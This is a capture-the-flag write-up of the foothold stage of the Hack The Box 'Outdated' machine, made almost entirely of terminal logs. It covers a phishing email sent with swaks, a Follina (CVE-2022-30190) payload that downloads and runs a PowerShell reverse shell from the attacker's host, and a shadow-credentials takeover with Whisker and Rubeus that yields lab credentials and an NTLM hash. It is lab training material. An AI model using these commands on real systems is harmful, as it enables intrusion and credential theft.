Foothold

Test email

adot@pwndot:~/htb/outdated$ swaks --server mail.outdated.htb --to [email protected] --from [email protected] --header 'Subject: Internal Web App' --body "http://10.10.14.18"
=== Trying mail.outdated.htb:25...
=== Connected to mail.outdated.htb.
<-  220 mail.outdated.htb ESMTP
 -> EHLO pwndot
<-  250-mail.outdated.htb
<-  250-SIZE 20480000
<-  250-AUTH LOGIN
<-  250 HELP
 -> MAIL FROM:<[email protected]m>
<-  250 OK
 -> RCPT TO:<[email protected]b>
<-  250 OK
 -> DATA
<-  354 OK, send.
 -> Date: Thu, 27 Feb 2025 07:11:58 -0600
 -> To: [email protected]
 -> From: [email protected]
 -> Subject: Internal Web App
 -> Message-Id: <20250227071158.449184@pwndot>
 -> X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/
 ->
 -> http://10.10.14.18
 ->
 ->
 -> .
<-  250 Queued (10.890 seconds)
 -> QUIT
<-  221 goodbye
=== Connection closed with remote host.

adot@pwndot:~/htb/outdated$ updog -p 80
[+] Serving /home/adot/htb/outdated...
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on all addresses (0.0.0.0)
 * Running on http://127.0.0.1:80
 * Running on http://192.168.2.228:80
Press CTRL+C to quit
10.10.11.175 - - [27/Feb/2025 07:12:15] "GET / HTTP/1.1" 200 -

We can leverage MS-MSDT "Follina" (CVE-2022-30190)

GitHub - chvancooten/follina.py: POC to replicate the full 'Follina' Office RCE vulnerability for testing purposesGitHub

adot@pwndot:~/htb/outdated/follina.py$ python follina.py -m command -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.18/powercat.ps1')" -t rtf -u 10.10.14.18
Generated 'clickme.rtf' in current directory
Generated 'exploit.html' in 'www' directory
Serving payload on http://10.10.14.18:80/exploit.html

adot@pwndot:~/htb/outdated$ swaks --server mail.outdated.htb --to [email protected] --from [email protected] --header 'Subject: Internal Web App' --body "http://10.10.14.18/exploit.html"
=== Trying mail.outdated.htb:25...
=== Connected to mail.outdated.htb.
<-  220 mail.outdated.htb ESMTP
<SNIP>

btables:GHKKb7GEHcccdCT8tQV2QwL3

PS C:\Users\btables> whoami /groups
whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                          Attributes
========================================== ================ ============================================ ==================================================
Everyone                                   Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4                                      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0                                      Mandatory group, Enabled by default, Enabled group
OUTDATED\ITStaff                           Group            S-1-5-21-4089647348-67660539-4016542185-1107 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1                                     Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

PS C:\Users\btables> .\SharpHound.exe -c all
.\SharpHound.exe -c all
2025-02-27T21:42:44.6514857-08:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2025-02-27T21:42:44.8858990-08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote

GitHub - eladshamir/Whisker: Whisker is a C# tool for taking over Active Directory user and computer accounts by manipulating their msDS-KeyCredentialLink attribute, effectively adding "Shadow Credentials" to the target account.GitHub

Compile, upload and run

PS C:\Users\btables> iwr 10.10.14.18/Whisker.exe -o whisker.exe
iwr 10.10.14.18/Whisker.exe -o whisker.exe
PS C:\Users\btables> .\Whisker.exe add /target:sflowers
.\Whisker.exe add /target:sflowers
[*] No path was provided. The certificate will be printed as a Base64 blob
[*] No pass was provided. The certificate will be stored with the password NzycSJ15jTkcosRW
[*] Searching for the target account
[*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID 8b9c4eac-1869-4bdb-aae5-9a660ffde5e2
[*] Updating the msDS-KeyCredentialLink attribute of the target object
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] You can now run Rubeus with the following syntax:

Rubeus.exe asktgt /user:sflowers /certificate:MIIJuAIBAzCCCXQGCSqGSIb3DQEHAaCCCWUEgglhMIIJXTCCBhYGCSqGSIb3DQEHAaCCBgcEggYDMIIF/zCCBfsGCyqGSIb3DQEMCgECoIIE/jCCBPowHAYKKoZIhvcNAQwBAzAOBAgziU8dnanmDAICB9AEggTY964E2gQSqUroHWujS01PzoWQg8NrVT08mQX67uM0Eo478GinAjJRKDJSvs4LnUC38lID1W1Y2ihK9bt/9vKomiEaHPS8ZcCk2yRm0gAQ19tqW4okyOn9ot+xOgPLY99LHZOBFB5bvHwhYt+V2AUO8939tPh8J0eaphKuqcQJH8lOiXKEWsXRmJUYmQ2078OtrWh1zyXwYoJ255+vHUU30of6rULLpNlGpd87P/mMAg/wRs875noyxcsKj7qbmyvDKq7gNq/sIHA/J+fGvmtUuuILJAll799WzFJhHxoV+9qxeEWtL0zo//BghUJx1CZ5eXHu22yYcHDeNWDIbFgbaxbXpwzqIV6jXfKKj7eiEI9ok+GHZr9BArG9B9089KpNG+R1/w21/17VbxjuvpBOxcZF9NR+nMsOiaqpKgPjalnV0mVbpJPQIS1uhYjWYzaNoxBpB3LjheossCco+uZrJewniSA0UHGRgCO9ND7Ww6KvrVDlsLzGaI2DgFhByKw4k/j7OZdsIP
<SNIP>

Rubeus.exe asktgt /user:sflowers /certificate:MIIJuAIBAzC.../password:"NzycSJ15jTkcosRW" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show

sflowers:1FCDB1F6015DCB318CC77BB2BDA14DB5

Previous25 NextPriv Esc

Last updated 10 months ago

Was this helpful?